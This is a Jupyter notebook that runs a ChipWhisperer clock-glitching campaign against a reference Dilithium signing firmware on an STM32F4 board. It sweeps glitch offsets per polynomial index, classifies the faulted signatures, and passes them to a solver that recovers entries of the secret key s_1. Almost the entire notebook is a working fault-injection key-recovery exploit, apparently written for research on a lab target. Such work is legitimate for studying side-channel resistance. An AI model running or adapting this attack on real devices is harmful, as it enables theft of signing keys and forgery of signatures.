# Dilithium Glitching: Signature-Only Attack

In [None]:
# Scope / target / firmware selection.
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F4'
SS_VER = 'SS_VER_2_1'

FW_DIR = "../../../hardware/victims/firmware/simpleserial-dilithium-ref"
fw_path = f"{FW_DIR}/simpleserial-dilithium-ref-{PLATFORM}.hex"

# Host-side timeout for one signing run, in milliseconds and in nanoseconds
# (the nanosecond value is compared against time.perf_counter_ns() deltas).
TIMEOUT_SIGNATURE_MS = 640
TIMEOUT_SIGNATURE_NS = TIMEOUT_SIGNATURE_MS * 1_000_000.0

In [None]:
import logging

logging.basicConfig(level=logging.NOTSET)

# Silence chatty third-party loggers below WARNING (please be quiet gurobi).
for _logger_name in ('io.github.alex1s.python-dilithium', 'gurobipy.gurobipy', 'usb_ctrl'):
    logging.getLogger(_logger_name).setLevel(logging.WARNING)
del _logger_name

# The default (root) logger should not be used anyway; keep it just above DEBUG.
logging.getLogger().setLevel(logging.DEBUG + 1)

# Notebook-local logger.
__LOGGER = logging.getLogger(__name__)
__LOGGER.setLevel(logging.DEBUG)

In [None]:
import sys

# Make the ChipWhisperer sources and the bundled helper packages importable
# (each path is appended at most once, so re-running the cell is harmless).
for _extra_path in ('../../../software', 'python-dilithium', 'dilithium_solver'):
    if _extra_path not in sys.path:
        sys.path.append(_extra_path)
del _extra_path

In [None]:
import chipwhisperer as cw
import importlib
import json
import uuid
import datetime
import threading
import numpy as np
import ipywidgets as widgets
from chipwhisperer.capture.targets import TargetIOError, TargetTimeoutError
from dilithium import Dilithium
import struct
import random
from collections import defaultdict
import time
import math
from operator import itemgetter
import functools
import pickle
import timeit
import enum

In [None]:
%%bash
# Build the simpleserial-dilithium-ref firmware (the same directory fw_path points into).
# NOTE(review): no PLATFORM/SS_VER is passed to make; confirm the Makefile default
# produces the simpleserial-dilithium-ref-CW308_STM32F4.hex that fw_path expects.
make -C ../../../hardware/victims/firmware/simpleserial-dilithium-ref

In [None]:
# Connect to the ChipWhisperer scope. When this cell is re-run, the existing
# ``scope`` object is reused and only reconnected if it is disconnected.
try:
    if not scope.connectStatus:
        scope.con()
except NameError:  # first run: ``scope`` is not defined yet
    scope = cw.scope()

# Attach the Dilithium SimpleSerial2 target to the scope and connect to it.
target = cw.target(scope, cw.targets.SimpleSerial2Dilithium)
target.scope = scope
target.con()

time.sleep(0.05)  # short pause before configuring the target (reason not documented; presumably settling time)
target.dglitch_settings()  # dilithium glitch settings

# Host-side Dilithium instance provided by the target wrapper; used below for
# reference signatures and for (un)packing.
d = target.dilithium

print("INFO: Found ChipWhisperer😍")

In [None]:
# Program the firmware onto the target; this takes a little while ...
# Comment out the following line to skip re-flashing an already-programmed target.
cw.program_target(scope, cw.programmers.STM32FProgrammer, fw_path)

In [None]:
# Time reboot_flush. The first call also checks that the chip is functional.
# The last line shows the mean duration in seconds over 10 calls.
target.reboot_flush()
timeit.timeit(target.reboot_flush, number=10) / 10

In [None]:
TEST_MSG = bytes([0x01])  # use b'\x00' if no shuffling is enabled

In [None]:
# Check that signing on the target works. After reboot_flush, sign TEST_MSG,
# print how long the signing command took (in seconds), and compare the
# returned signature with the host-side reference signature for the same key.
import binascii
target.reboot_flush()
start = time.perf_counter()  # monotonic clock: not affected by system clock adjustments
target.sign(TEST_MSG)
print(time.perf_counter() - start)
sig_target = target.get_sig()
print("Target secret key", binascii.hexlify(target.secret_key))
assert sig_target == d.signature(TEST_MSG, target.secret_key), \
    "signature from the target does not match the reference implementation"

In [None]:
# Check that target.loop_duration_sign (read after a fresh reboot_flush) has the
# expected value of 3976. trig_count_threshold() uses it as the trigger count of
# one signing-loop iteration.
# NOTE(review): the values below are exact multiples of 3976 (4x, 8x, 16x, 20x);
# presumably durations observed with other builds/settings — confirm.
# ([15904, 31808, 63616, 79520])
target.reboot_flush()
assert target.loop_duration_sign == 3976, f'instead it is: {target.loop_duration_sign}'
target.loop_duration_sign

In [None]:
class Rating(enum.Enum):
    """Coarse quality label attached to each result group."""

    GOOD = 'good'
    NEUTRAL = 'neutral'
    BAD = 'bad'


class GroupStr(str):
    """A ``str`` group name that additionally carries a :class:`Rating`.

    Instances compare, hash and format like the plain string value, so they
    can be used wherever a group name is expected. ``str(group)`` yields a
    plain ``str`` without the rating.
    """

    rating: Rating

    def __new__(cls, value: str, rating: Rating):
        new = super().__new__(cls, value)
        new.rating = rating
        return new

    def __getnewargs__(self):
        # The inherited ``str.__getnewargs__`` returns only the string value.
        # ``copy.copy`` and ``pickle`` would then call ``__new__`` without
        # ``rating`` and fail with a TypeError.
        return (str(self), self.rating)

In [None]:
# Empirical straight line for the glitch timing: the ext_offset used for
# polynomial index k is y_intercept + k * slope. Only 'slope' and
# 'y_intercept' are used below; the other entries are statistics stored with it.
straight_line = {'slope': 62,
  'y_intercept': 55,
  'num_points': 28,
  'l': 'B',
  'total_good': 186,
  'total_bad': 781,
  'success_rate': 0.1923474663908997
}

# Explicit ext_offset list (commented out; kept for reference):
# magic_numbers = (55, 117, 179, 241, 302, 365, 427, 488, 551, 613, 673, 736, 798, 857, 919, 983, 1045, 1109, 1170, 1233, 1295, 1353, 1419, 1481, 1543, 1605, 1663, 1728, 1791, 1853, 1915, 1977, 2039, 2101, 2163, 2225, 2287, 2349, 2411, 2473, 2535, 2597, 2659, 2721, 2783, 2845, 2907, 2969, 3031, 3093, 3155, 3217, 3279, 3341, 3403, 3465, 3527, 3589, 3651, 3713, 3775, 3837, 3899)
magic_numbers = [straight_line['y_intercept'] + poly_index * straight_line['slope'] for poly_index in range(d._polyz_unpack_num_iters - 1)]
ext_offsets = magic_numbers
offsets = (0.390625,)
widths = (1.562500,)
repeats = (1,)
# Messages to try per parameter set; effectively unbounded (== inf). A lazy
# range supports the iteration and min()/max() used later without
# materialising 10 million ints. A tuple of this size costs hundreds of MB and
# is very slow to display.
messages = range(10000000)
redos = (1,)  # one try per message

# Sweeping of a poly index stops once every row of z has at least this many
# coefficients with |z| <= beta (see other_loops).
min_num_zeros = 2 * d.n

RES_FNAME = f'gc.results.pickled.signature-attacks-{datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")}.pickle'
RES_FNAME

In [None]:
# Optional: uncomment the following block to search from the middle outwards.
# The reordered list alternates between the upper half of ext_offsets (even
# positions, ascending) and the lower half in reverse order (odd positions).
# NOTE(review): the campaign loop labels results with enumerate(ext_offsets),
# so after this reordering the recorded poly_index no longer matches the index
# used to compute magic_numbers — confirm this is intended before enabling.

#a =  ext_offsets[:len(ext_offsets) // 2][::-1]
#b =  ext_offsets[len(ext_offsets) // 2:]
#res = [None] * len(ext_offsets)
#res[1::2] = a
#res[::2] = b
#ext_offsets = res

ext_offsets

In [None]:
# scope.glitch.offset values swept by other_loops
offsets

In [None]:
# scope.glitch.width values swept by other_loops
widths

In [None]:
# scope.glitch.repeat values swept by other_loops
repeats

In [None]:
# ``messages`` can hold about 10 million entries. Echoing it directly would
# render every element, so show only its length and bounds.
len(messages), min(messages), max(messages)

In [None]:
# repetition values per message (one try per message)
redos

In [None]:
# per-row count of |z| <= beta coefficients after which other_loops stops sweeping a poly index
min_num_zeros

In [None]:
# Rebind ``d`` to a freshly constructed host-side Dilithium object (argument 2).
# This replaces the ``target.dilithium`` instance bound when connecting.
# NOTE(review): the cells below (group counts, unpacking of target signatures,
# solver parameters) use this ``d``. Presumably 2 is the parameter set the
# firmware was built for — confirm it matches target.dilithium.
import dilithium
d = dilithium.Dilithium(2)

In [None]:
# Number of polynomial indices that get their own series of result groups.
_num_polys = d._polyz_unpack_num_iters - 1


def _make_groups(label: str, rating: Rating) -> tuple:
    """Return one GroupStr named ``"<poly_index> <label>"`` per polynomial index."""
    return tuple(GroupStr(f"{poly_index} {label}", rating) for poly_index in range(_num_polys))


GROUPS_ZEROS = _make_groups("zeros", Rating.GOOD)
GROUPS_OTHER = _make_groups("other", Rating.NEUTRAL)
GROUPS_TIMEOUT_COUNT = _make_groups("to count", Rating.BAD)
GROUPS_TIMEOUT_TIME = _make_groups("to time", Rating.BAD)
GROUPS_EXCEPTION_SIGN = _make_groups("exc sign", Rating.BAD)
GROUPS_EXCEPTION_GET_SIG = _make_groups("exc get_sig", Rating.BAD)
GROUP_CONSTANT = GroupStr("constant", Rating.BAD)

# Ordering: the six outcome groups of poly index 0, then those of index 1, ...,
# and finally the single "constant" group.
GROUPS = tuple(
    group
    for per_poly in zip(
        GROUPS_ZEROS,
        GROUPS_OTHER,
        GROUPS_TIMEOUT_COUNT,
        GROUPS_TIMEOUT_TIME,
        GROUPS_EXCEPTION_SIGN,
        GROUPS_EXCEPTION_GET_SIG,
    )
    for group in per_poly
) + (GROUP_CONSTANT,)
PARAMETERS = ('ext_offset', 'offset', 'width', 'repeat', 'message', 'redo')

In [None]:
import chipwhisperer.common.results.glitch as glitch

# Groups are registered as plain strings; their ratings are stored separately
# in the "constant" record's metadata.
gc = glitch.GlitchController(groups=list(map(str, GROUPS)), parameters=PARAMETERS)

# Each swept parameter's range spans the smallest to the largest value tried.
for _name, _values in (
    ("ext_offset", ext_offsets),
    ("offset", offsets),
    ("width", widths),
    ("repeat", repeats),
    ("message", messages),
    ("redo", redos),
):
    gc.set_range(_name, min(_values), max(_values))
del _name, _values

gc.display_stats()

In [None]:
# Read-only progress sliders. zero_widgets[poly_index][i] shows how many
# coefficients with |z| <= beta have been collected so far in row i of z
# while glitching polynomial index poly_index. other_loops updates them.
# The slider range goes up to 5 * min_num_zeros.
zero_widgets = [
    [
        widgets.IntSlider(
            value=0,
            min=0,
            max=min_num_zeros * 5,
            step=1,
            description=f'{poly_index} {i}',
            disabled=True,
            continuous_update=False,
            orientation='horizontal',
            readout=True,
            readout_format='d',
        )
        for i in range(d.l)
    ]
    for poly_index in range(d._polyz_unpack_num_iters - 1)
]
# Distinct loop names so the imported ``widgets`` module is not shadowed.
display(*[slider for row in zero_widgets for slider in row])

In [None]:
def message_to_bytes(message: int) -> bytes:
    """Encode *message* as the 4-byte big-endian unsigned integer sent to the target."""
    return struct.pack("!I", message)


def trig_count_threshold() -> int:
    """Trigger-count limit for one signing run.

    The limit covers ``d.l - 1`` full signing-loop iterations of
    ``target.loop_duration_sign`` each, plus
    ``target.loop_duration_sign_threshold`` for the last one.
    """
    full_iterations = d.l - 1
    return full_iterations * target.loop_duration_sign + target.loop_duration_sign_threshold
# show the limit one_try uses to classify a run as "to count" (trig_count exceeded it before any response)
trig_count_threshold()

In [None]:
gc_lock = threading.Lock()  # serialises gc.add with the background save thread


def gc_add(group, parameters, strdesc=None, metadata=None) -> None:
    """Record one result in the GlitchController ``gc``.

    For every group except ``GROUP_CONSTANT``, a new metadata dict is built
    from *metadata*. It is enriched with:

    * a running counter;
    * the message, both as int and as the bytes sent to the target;
    * the current ``scope.adc.trig_count``;
    * a timestamp.

    ``GROUP_CONSTANT`` metadata is passed through unchanged. *strdesc* is
    accepted for interface compatibility but not used.
    """
    if group != GROUP_CONSTANT:
        base = {} if metadata is None else metadata
        message_int = parameters[gc.parameters.index("message")]
        metadata = {
            **base,
            "global_counter": gc_add.global_counter,
            "message_int": message_int,
            "message_bytes": message_to_bytes(message_int),
            "trig_count": scope.adc.trig_count,
            "timestamp": time.time(),
        }
        gc_add.global_counter += 1

    with gc_lock:
        try:
            gc.add(str(group), parameters, metadata=metadata)
        except TypeError:
            # raised if we do not "gc.display_stats"; not a problem: still collects all data
            pass


gc_add.global_counter = 0

In [None]:
# Run-wide constants, recorded once in the "constant" group with every
# parameter set to -1. The 'start_times' dict is filled in later by the
# campaign loop.
_constant_metadata = dict(
    secret_key=target.secret_key,
    trig_count_threshold=trig_count_threshold(),
    group_to_rating={str(group): group.rating.value for group in GROUPS},
    start_times={},
    magic_numbers=magic_numbers,
    min_num_zeros=min_num_zeros,
)
gc_add(GROUP_CONSTANT, (-1,) * len(gc.parameters), metadata=_constant_metadata)

In [None]:
def one_try(param_tuple, poly_index: int) -> "np.ndarray | None":
    """
    Run one glitched signing attempt on the target and record the outcome.

    The target is reset, the scope is re-armed (which zeroes
    ``scope.adc.trig_count``), and the message selected by *param_tuple* is
    sent for signing. The outcome is recorded via ``gc_add`` in exactly one of
    the groups for *poly_index*:

    * ``GROUPS_TIMEOUT_TIME``: no response within ``TIMEOUT_SIGNATURE_NS``.
    * ``GROUPS_TIMEOUT_COUNT``: ``scope.adc.trig_count`` exceeded
      ``trig_count_threshold()`` before any response arrived.
    * ``GROUPS_EXCEPTION_SIGN``: a ``TargetIOError`` while receiving the sign
      response.
    * ``GROUPS_EXCEPTION_GET_SIG``: a ``TargetIOError`` while fetching the
      signature.
    * ``GROUPS_ZEROS``: more than ``d._polyz_unpack_num_iters`` coefficients
      of ``z`` satisfy ``|z| <= d.beta``.
    * ``GROUPS_OTHER``: any other received signature.

    :param param_tuple: glitch parameters ordered as ``gc.parameters``
        (ext_offset, offset, width, repeat, message, redo). Only the message
        entry is used here; the glitch settings are expected to already be
        applied to ``scope.glitch`` by the caller.
    :param poly_index: selects which per-polynomial group series the outcome
        is recorded in.
    :returns: ``None`` if no signature was obtained. Otherwise the per-row
        counts of ``z`` coefficients with ``|z| <= d.beta``
        (``np.count_nonzero(..., axis=1)``).
    """
    start = time.perf_counter_ns()
    target.reboot_flush()
    reset_duration_ns = time.perf_counter_ns() - start
    metadata = {'reset_duration_ns': reset_duration_ns}

    message = param_tuple[gc.parameters.index("message")]
    message_bytes = message_to_bytes(message)

    start_time = time.perf_counter_ns()

    # l - 1 normal iterations and one with threshold
    count_threshold = trig_count_threshold()

    # these TWO commands combined set scope.adc.trig_count to zero
    scope.sc.arm(False)
    scope.arm()
    assert scope.adc.trig_count == 0

    target.sign_send(message_bytes)
    while target.in_waiting() == 0:  # no response from target yet
        if time.perf_counter_ns() - start_time > TIMEOUT_SIGNATURE_NS:
            gc_add(GROUPS_TIMEOUT_TIME[poly_index], param_tuple)
            return None
        if scope.adc.trig_count > count_threshold:
            gc_add(GROUPS_TIMEOUT_COUNT[poly_index], param_tuple)
            return None

    try:
        target.sign_recv(timeout=100)  # should be quick as target already started sending
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_SIGN[poly_index], param_tuple)
        return None

    try:
        signature_packed = target.get_sig()
    except TargetIOError:  # corrupted or no response from the target; we could but do not really care to differentiate
        gc_add(GROUPS_EXCEPTION_GET_SIG[poly_index], param_tuple)
        return None

    # okay, now we are done with the target ...
    metadata['packed'] = signature_packed

    _, z, _ = d._unpack_sig(signature_packed)
    # "zeros" here means coefficients with |z| <= beta; the mask is computed once
    # and used both for the classification and for the per-row return value.
    small = np.abs(z) <= d.beta
    num_zeros = np.count_nonzero(small)  # TODO change to d._polyz_unpack_coeffs_per_iter // 2 or something like that ...
    if num_zeros > d._polyz_unpack_num_iters:
        gc_add(GROUPS_ZEROS[poly_index], param_tuple, metadata=metadata)
    else:
        gc_add(GROUPS_OTHER[poly_index], param_tuple, metadata=metadata)

    return np.count_nonzero(small, axis=1)

In [None]:
def save_results(results=None, fname=None) -> None:
    """Pickle the glitch results to disk, replacing the file atomically.

    The data is written to ``<fname>.tmp`` first and then moved over *fname*
    with ``os.replace``. This function runs periodically from the background
    save thread during long campaigns, so an interrupted write must never
    replace the previous good file with a truncated pickle.

    :param results: object to pickle; defaults to ``gc.results``.
    :param fname: destination file name; defaults to ``RES_FNAME``.
    """
    import os

    if results is None:
        results = gc.results
    if fname is None:
        fname = RES_FNAME
    tmp_fname = f"{fname}.tmp"
    with open(tmp_fname, 'wb') as f:
        pickle.dump(results, f)
    os.replace(tmp_fname, fname)

In [None]:
save_thread_event = threading.Event()


def save_thread() -> None:
    """Call ``save_results()`` under ``gc_lock`` every two minutes until ``save_thread_event`` is set.

    The first save happens immediately. Waiting on the event instead of
    sleeping lets ``thread.join()`` return as soon as the event is set. A plain
    sleep could delay the join by up to two more minutes.
    """
    while not save_thread_event.is_set():
        with gc_lock:
            save_results()
        save_thread_event.wait(2 * 60)  # two minutes, or until asked to stop


thread = threading.Thread(target=save_thread)

In [None]:
def _show_param(name: str, value) -> None:
    """Mirror *value* into the GlitchController widget for parameter *name*, if widgets exist."""
    if gc.widget_list_parameter is not None:
        gc.widget_list_parameter[gc.parameters.index(name)].value = value


def other_loops(poly_index: int, ext_offset: int):
    """Sweep offset/width/repeat/message/redo at a fixed *ext_offset*.

    offset, width and repeat are applied to ``scope.glitch``. message and redo
    select and repeat the signing input. For every combination ``one_try`` is
    called. The per-row counts it returns are summed into ``zeros`` and shown
    on ``zero_widgets[poly_index]``.

    Returns as soon as every entry of ``zeros`` reaches ``min_num_zeros``, or
    after all combinations have been tried.
    """
    zeros = np.zeros(d.l)

    for offset in offsets:
        scope.glitch.offset = offset
        _show_param("offset", offset)
        for width in widths:
            scope.glitch.width = width
            _show_param("width", width)
            for repeat in repeats:
                scope.glitch.repeat = repeat
                _show_param("repeat", repeat)
                for message in messages:
                    _show_param("message", message)
                    for redo in redos:
                        _show_param("redo", redo)

                        param_tuple = ext_offset, offset, width, repeat, message, redo
                        new_zeros = one_try(param_tuple, poly_index)

                        if new_zeros is not None:
                            zeros += new_zeros
                            # only touch the sliders when something changed
                            if np.any(new_zeros > 0):
                                for i in range(d.l):
                                    zero_widgets[poly_index][i].value = zeros[i]

                        if np.all(zeros >= min_num_zeros):
                            return

In [None]:
# Run the glitch campaign. For each polynomial index, glitch at the matching
# ext_offset and sweep the remaining parameters (other_loops). The background
# save thread saves results periodically. The try/finally guarantees that the
# thread is signalled and joined even if the campaign is interrupted (e.g.
# KeyboardInterrupt) or raises.
thread.start()
logging.getLogger("ChipWhisperer Target").setLevel(logging.WARNING + 1)  # disable WARNING messages like "Read timed out: " or "Read timed out: Wÿ+"

start_time = time.time()
try:
    for poly_index, ext_offset in enumerate(ext_offsets):
        scope.glitch.ext_offset = ext_offset
        if gc.widget_list_parameter is not None:
            gc.widget_list_parameter[gc.parameters.index("ext_offset")].value = ext_offset
        # remember when work on this poly index started (stored in the "constant" record)
        gc.results.result_dict['constant'][0]['metadata']['start_times'][poly_index] = time.time()
        other_loops(poly_index, ext_offset)
finally:
    end_time = time.time()
    total_duration = end_time - start_time
    print(f'total duration: {total_duration}s {total_duration/60}min {total_duration/3600}h')

    print("Setting event for save thread.")
    save_thread_event.set()
    print("Joining with save thread.")
    thread.join()

In [None]:
# Final save of the collected results to RES_FNAME after the campaign.
save_results()

In [None]:
# Halt notebook execution at this point (e.g. under "Run All") with an explicit
# error instead of relying on an undefined name. Run the cells below manually.
raise RuntimeError("Stopping execution here on purpose; run the following cells manually.")

In [None]:
# Post-processing: try to recover the entries of s_1 from the faulted
# signatures collected by the campaign.
from dilithium_solver.signature import Signature, calculate_c_matrix_np
from dilithium_solver.recover_s_1_entry import recover_s_1_entry
from dilithium_solver.parameters import Parameters

# Packed signatures of the "zeros" groups (Rating.GOOD), taken from the
# 'packed' metadata key that one_try stores.
# NOTE(review): these names were previously undefined in this notebook; confirm
# this is the intended selection of signatures.
sigs_faulted = [
    entry['metadata']['packed']
    for group in GROUPS_ZEROS
    for entry in gc.results.result_dict.get(str(group), [])
]
# Secret key of the target. Its s_1 is passed to recover_s_1_entry
# (presumably to evaluate the recovery — confirm).
sk = target.secret_key

sigs_faulted_unpacked = [d._unpack_sig_full(sig_packed) for sig_packed in sigs_faulted]

params = Parameters.get_nist_security_level(d.nist_security_level)

sigs = [
    Signature(
        sig_faulted[1],
        sig_faulted[0],
        calculate_c_matrix_np(sig_faulted[0], params)
    )
    for sig_faulted in sigs_faulted_unpacked
]

s_1 = d._unpack_sk(sk)[4]
timeout = 10
threshold = d.beta
if not sigs:
    print("No faulted signatures collected; nothing to recover.")
else:
    for i in range(d.l):
        result = recover_s_1_entry(sigs, i, s_1, params, 142387, timeout, threshold)  # this number is not relevant
        print(result)

In [None]:
# Release the hardware: disconnect the scope, then the target.
scope.dis()
target.dis()